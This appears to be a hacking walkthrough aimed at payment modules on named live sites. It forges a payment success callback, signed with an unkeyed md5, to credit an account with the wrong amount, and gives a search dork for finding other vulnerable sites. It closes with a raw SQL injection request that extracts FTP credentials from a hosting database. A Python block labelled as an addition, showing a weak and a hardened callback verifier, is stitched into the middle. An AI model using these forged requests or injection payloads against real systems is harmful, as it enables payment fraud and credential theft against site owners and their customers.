Test site: http://www.xiaoweio.cn/
Register an account, for example "test".
Open: http://www.xiaoweio.cn/netpay/ips/
Enter your username and the recharge amount.
Example: test, 10 yuan
Click Next and an order number is generated for you, for example 722978.
Remember it.
Parameter construction:

```
billno=<order number>&amount=<recharge amount>&date=<date>&succ=Y&signature=<md5 value>
```

date = the current date
amount = the recharge amount for that order number
With the actual values filled in:

```
billno=722978&amount=5&date=20100613&succ=Y&signature=990a56c327f4b60d0c4d94a880f728ec
```

md5 value = md5(billno + amount + date + succ), i.e. the four values concatenated with no separator and no secret.
For the values above, as demonstrated here:
md5("722978520100613Y") = 990a56c327f4b60d0c4d94a880f728ec
Submit this URL:

```
http://www.xiaoweio.cn/netpay/ips/receive.asp?billno=722978&amount=5&date=20100613&succ=Y&signature=990a56c327f4b60d0c4d94a880f728ec
```

Submitting it credits the account with five yuan, even though the order was for ten.
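As an added example (not code from this post or from the site it describes), here is a server-side verifier for the callback scheme just walked through, next to a hardened version; the secret key, the order table and the field separator are assumptions. It shows why the weak check accepts a notification built by anyone who knows the public fields, and how a keyed MAC plus an amount check closes that gap.

```python
import hashlib
import hmac

# Constructed order store standing in for the merchant database:
# order number -> amount the customer actually ordered (page example: 722978 for 10 yuan).
ORDERS = {"722978": "10"}


def weak_signature(billno: str, amount: str, date: str, succ: str) -> str:
    """Signature scheme described in the post: md5 over the four public fields, concatenated.
    There is no secret, so any client can compute it for any amount it likes."""
    return hashlib.md5(f"{billno}{amount}{date}{succ}".encode()).hexdigest()


def weak_verify(params: dict) -> bool:
    """Callback check the post implies: recompute the md5 and compare, nothing else."""
    expected = weak_signature(params["billno"], params["amount"], params["date"], params["succ"])
    return params["signature"] == expected


def strong_signature(billno: str, amount: str, date: str, succ: str, secret: bytes) -> str:
    """Hardened scheme (an assumption, not the site's code): HMAC-SHA256 keyed with a
    secret known only to the merchant and the payment gateway. Fields are joined with
    an explicit separator so that '7229|78' and '72297|8' cannot collide."""
    message = "|".join([billno, amount, date, succ]).encode()
    return hmac.new(secret, message, hashlib.sha256).hexdigest()


def strong_verify(params: dict, secret: bytes, orders: dict = ORDERS) -> bool:
    """Hardened callback check: the amount in the notification must equal the amount
    stored for that order, and the MAC is checked with a constant-time compare."""
    order_amount = orders.get(params["billno"])
    if order_amount is None or order_amount != params["amount"]:
        return False
    expected = strong_signature(
        params["billno"], params["amount"], params["date"], params["succ"], secret
    )
    return hmac.compare_digest(params["signature"], expected)
```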
A search keyword for you: inurl:(netpay/alipay)
Injection vulnerability

```
POST /netpay/allbuy/receive.asp?amount=1&success=Y&sign=d3d9df7301929c5684fb52c267186b21 HTTP/1.1
Cookie: billno=1'%20or%200%3c%3e(select%20top%201%20FtpName%2bchar(124)%2bftppassword%2bchar(124)%2bhostname%20from%20FreeHost.FreeHost_Product_Host%20where%20Id%20not%20in(select%20top%200%20id%20from%20FreeHost.FreeHost_Product_Host%20order%20by%20id)%20order%20by%20id)%3b--
Content-Type: application/x-www-form-urlencoded
Referer: http://www.9c2c.com/netpay/allbuy/receive.asp?amount=1&success=Y&sign=d3d9df7301929c5684fb52c267186b21
Host: www.9c2c.com
Content-Length: 7
Expect: 100-continue
Connection: Keep-Alive
```